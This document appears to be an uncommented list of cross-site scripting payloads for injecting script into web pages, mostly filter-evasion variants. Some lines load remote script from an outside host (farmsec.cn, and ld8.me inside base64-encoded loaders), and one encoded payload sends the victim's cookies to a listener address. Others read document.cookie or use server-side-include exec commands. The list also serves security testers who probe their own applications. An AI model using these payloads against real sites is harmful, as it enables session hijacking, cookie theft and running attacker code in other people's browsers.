<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.farmsec.cn/xss.js"></OBJECT>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"/></sCript><svG x=">" onload=(co\u006efirm)``>
"/><svg onload=alert(1)>
"></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><iframe src="javascript:alert(XSS)">
��><img src="1" onerror="alert(1)">
"><img src="x:x" onerror="alert(XSS)">
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL1pyeWIiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
"><img src=x onerror=alert('XSS');>
'"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL1pyeWIiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
"><script>alert(String.fromCharCode(88,83,83))</script>
"><svg/onload=alert(/XSS/)
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"alert(1)" instanceof [];</script>
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
${alert`1`}`</script>
%22accesskey=%22X%22%20onclick="alert`0`"
%27"aaa><link%20rel="xxe%20import%20xxx"%20href="//baidu.com/test.svg"><img%20src=x>
&#39;&#88;&#83;&#83;&#39;&#41;>
({[alert(1)](){}});
({get[alert(2)](){}});
({set[alert(3)](a){}});
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode<script>alert('xss')</script>
?"></script><base%20c%3D=href%3Dhttps:\mysite>
?script?alert(??XSS??)?/script?
\";alert('XSS');//
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.farmsec.cn/xss.js></SCRIPT>'"-->
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.farmsec.cn/xss.js></SCRIPT>'"-->
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://www.farmsec.cn/xss.js></SCRIPT>'"-->
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
</script>
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
</script><script>alert('XSS');</script>
</script><svg><script>alert(1)-%26apos%3B
</style></scRipt><scRipt>alert(1)</scRipt>
</tEXtArEa>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22https%3A%2F%2Fld8.me%2FZryb%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<? echo('<SCR)';
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
<A HREF="//google">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="http://%77%77%77%2e%66%61%72%6d%73%65%63%2e%63%6e%2f%78%73%73%2e%6a%73">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://000007541724575">XSS</A>
<A HREF="http://192.168.0.1">XSS</A>
<A HREF="http://www.farmsec.cn/xss.js">XSS</A>
<A HREF="http://www.baidu.com.farmsec.cn">XSS</A>
<A HREF="http://www.farmsec.cn@www.baidu.com">XSS</A>
<A HREF="javascript:document.location='http://www.farmsec.cn/xss.js'">XSS</A>
<a href=javas&#99;ript:alert(1)>
<a onmouseover="alert(document.cookie)">xxs link</a> 
<a onmouseover=alert(document.cookie)>xxs link</a> 
<applet code="javascript:confirm(document.cookie);">
<audio src onloadstart=alert(1)>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<body onload=alert(/XSS/.source)>
<BODY ONLOAD=alert('XSS')>
<BR SIZE="&{alert('XSS')}">
<details/open/ontoggle="alert`1`">
<details/open/ontoggle=alert`1`>
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<form><a href="javascript:\u0061lert(1)">X
<form><button formaction=javascript&colon;alert(1)>CLICKME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<iframe src=http://www.farmsec.cn/xss.js<
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
<IMG onmouseover="alert('xxs')">
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<img src="" onerror="document.write(String.fromCharCode(60,115,67,82,105,80,116,32,115,82,67,61,47,47,108,100,56,46,109,101,47,90,114,121,98,62,60,47,115,67,114,73,112,84,62))">
<img src="/" =_=" title="onerror='prompt(1)'">
<img src="1" onerror{${sleep(20)}}
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<IMG SRC="http://www.farmsec.cn/xss.js">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="livescript:[code]">
<IMG SRC="mocha:[code]">
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;__XSS__;&#39;&#41; />
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27__XSS__&#x27&#x29 />
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<img src='1' onerror/=alert(0) />
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />
<img src='1' onerror='alert(0)' <
<img src=jav&#x09;ascript:alert("__XSS__"); />
<img src=jav&#x09;ascript:alert('__XSS__'); />
<img src=JaVaS\tcRiPt:String.fromCharCode(0,__XSS__,1) />
<img src=javascrip&sss#x74;:alert(471)
<img src=javascript:alert("__XSS__") />
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<img src=javascript:alert('__XSS__') />
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<img src=javascript:String.fromCharCode(0,__XSS__,1) />
<img src=JaVaScRiPt:String.fromCharCode(0,__XSS__,1) />
<IMG SRC=javascrscriptipt:alert('XSS')>
<img src=validimg.png onload:String.fromCharCode(0,__XSS__,1) />
<img src=validimg.png onload=alert("__XSS__") />
<img src=validimg.png onload=alert('__XSS__') />
<IMG SRC='vbscript:msgbox("XSS")'>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<img/id="alert&lpar;&#x27;XSS&#x27;&#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&#x29;>
<img/src='1'/onerror=alert(0)>
<imgsrc=xonerror=alert(document.cookie)>
<input autofocus onfocus=alert(1)>
<input type="hidden" accesskey="X" onclick="alert(1)">
<input type="image" onerror="alert(1)" src="1">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<Input value = "XSS" type = text>
<input value="${alert(1)}`</script/">
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<isindex type=image src=1 onerror=alert(XSS)>
<isindex x="javascript:" onmouseover="alert(XSS)">
<keygen autofocus onfocus=alert(1)>
<LAYER SRC="http://www.farmsec.cn/xss.js"></LAYER>
<LINK REL="stylesheet" HREF="http://www.farmsec.cn/xss.js">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<marquee onstart=alert(1)>
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<META HTTP-EQUIV="Link" Content="<http://www.farmsec.cn/xss.js>; REL=stylesheet">
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
<noscript><noscript></noscript><script>confirm(1)</script></noscript>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<object data="javascript:alert(XSS)">
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.farmsec.cn/xss.js"></OBJECT>
<object><param name=x value=javascript:alert("__XSS__")></object>
<object><param name=x value=javascript:alert('__XSS__')></object>
<object><param name=x value=javascript:String.fromCharCode(0,__XSS__,1)></object>
<scr<script>ipt src=http://__XSS__/x.js></scr</script>ipt>
<scr<script>ipt src=http://__XSS__/x.js></script>
<scr<script>ipt>alert("__XSS__")</scr</script>ipt>
<scr<script>ipt>alert("__XSS__")</script>
<scr<script>ipt>alert('__XSS__')</scr</script>ipt>
<scr<script>ipt>alert('__XSS__')</script>
<scr<script>ipt>String.fromCharCode(0,__XSS__,1)</scr</script>ipt>
<scr<script>ipt>String.fromCharCode(0,__XSS__,1)</script>
<SCRIPT "a='>'" SRC="http://www.farmsec.cn/xss.js"></SCRIPT>
<script ~~~>confirm(1)</script ~~~>
<SCRIPT =">" SRC="http://www.farmsec.cn/xss.js"></SCRIPT>
<script >alert("__XSS__")</script >
<script >alert('__XSS__')</script >
<ScRiPt >String.fromCharCode(0,__XSS__,1)</ sCrIpT>
<script >String.fromCharCode(0,__XSS__,1)</script >
<SCRIPT a=">" '' SRC="http://www.farmsec.cn/xss.js"></SCRIPT>
<SCRIPT a=">" SRC="http://www.farmsec.cn/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://www.farmsec.cn/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://www.farmsec.cn/xss.js"></SCRIPT>
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
<SCRIPT SRC="http://www.farmsec.cn/xss.js"></SCRIPT>
<SCRIPT SRC=//www.farmsec.cn/xss.js>
<script src=http://__XSS__/x.js></script>
<ScRiPt src=http://__XSS__/x.js></sCrIpT>
<SCRIPT SRC=http://www.farmsec.cn/xss.js></SCRIPT>
<SCRIPT SRC=http://www.farmsec.cn/xss.js< B >
<SCRIPT SRC=http://www.farmsec.cn/xss.js?< B >
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<script/ src=http://__XSS__/x.js></script/>
<ScRiPt/ src=http://__XSS__/x.js></sCrIpT/>
<script/>alert("__XSS__")</script/>
<ScRiPt/>alert("__XSS__")</sCrIpT/>
<ScRiPt/>alert('__XSS__')</sCrIpT/>
<SCRIPT/SRC="http://www.farmsec.cn/xss.js"></SCRIPT>
<SCRIPT/XSS SRC="http://www.farmsec.cn/xss.js"></SCRIPT>
<script> ({[alert`M`]:1})</script>
<script>!class extends`${alert(1)}```{}</script>
<script>!function(lol=alert(1)){}()</script>
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
<script>$=1,\u0061lert($)</script>
<script>$=1,alert($)</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
<script>(function([a,b,c]=[1,2,3]){alert(`${a},${b},${c}`)})()</script>
<script>[...`${alert(1)}`]</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>-{valueOf(){alert`:D`}}</script>
<script>-{'valueOf'(){setTimeout(this)},[Symbol['toStringTag']]:'=alert`1`'}</script>
<script>00000`${alert(1)}`</script>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<script>a=`jackmasa<!--<script/\`;</script>
<script>Array.prototype[Symbol.hasInstance]=eval;
<script>Array[Symbol.species].constructor('alert(1)')();</script>
<script>delete []['__proto__']['toString'];	
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://www.farmsec.cn/xss.js"></SCRIPT>
<script>eval(`ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(1)`);</script>
<script>f=(x=alert(1))=>{}; f();</script>
<script>Lol:Function`alert(1)```````````</script>
<script>new alert`1`</script>
<script>new new new `${alert(1)/*}`*/}`</script>
<script>new new new new new alert`1`</script>
<script>o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()</script>
<script>object=1;eval({[Symbol.toStringTag]: ',alert(1)'}+'')</script>
<script>String.fromCharCode(0,__XSS__,1)</script>
<ScRiPt>String.fromCharCode(0,__XSS__,1)</sCrIpT>
<script>String.raw(a=alert(1),1,2)</script>
<script>x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())</script>
<script>x=x=>x=>x=>x=>x=>x=>x=>alert(1);x()()()()()()()()</script>
<select autofocus onfocus=alert(1)>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> 
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<style>//*{x:expression(alert(/xss/))}//<style></style> 
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>@import'http://www.farmsec.cn/xss.js';</STYLE>
<STYLE>BODY{-moz-binding:url("http://www.farmsec.cn/xss.js")}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<svg id=alert(1) onload=eval(id)>
<svg onload=alert(1)//
<svg onwheel=prompt.call(null,1)>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg/onload=alert('XSS')>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg><script xlink:href=data&colon;,window.open('http://www.farmsec.cn/xss.js')></script
<svg><x><script>alert&#40;&#39;1&#39;&#41</x>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<textarea autofocus onfocus=alert(1)>
<video src=_ onloadstart="alert(1)">
<video/poster/onerror=alert(1)>
<Video> <source onerror = "javascript: alert (XSS)">
<video><source onerror="javascript:alert(1)">
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<XML SRC="http://www.farmsec.cn/xss.js" ID=I></XML>
<XML SRC="xsstest.xml" ID=I></XML>
<XSS STYLE="behavior: url(xss.htc);">
<XSS STYLE="xss:expression(alert('XSS'))">
11"><IMG SRC="" onerror="prompt(1)"
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
anythinglr00</script><script>alert(document.domain)</script>uxldz
b=`*/(1)}`;</script>
data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
eval([1,2,3]+'');</script>
exp/*<A STYLE='no\xss:noxss("*//*");
exp/*<XSS STYLE='no\xss:noxss("*//*");
getURL("javascript:alert('XSS')")
jav%0aascr%0aipt:opener.alert(1)%2F%2F
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
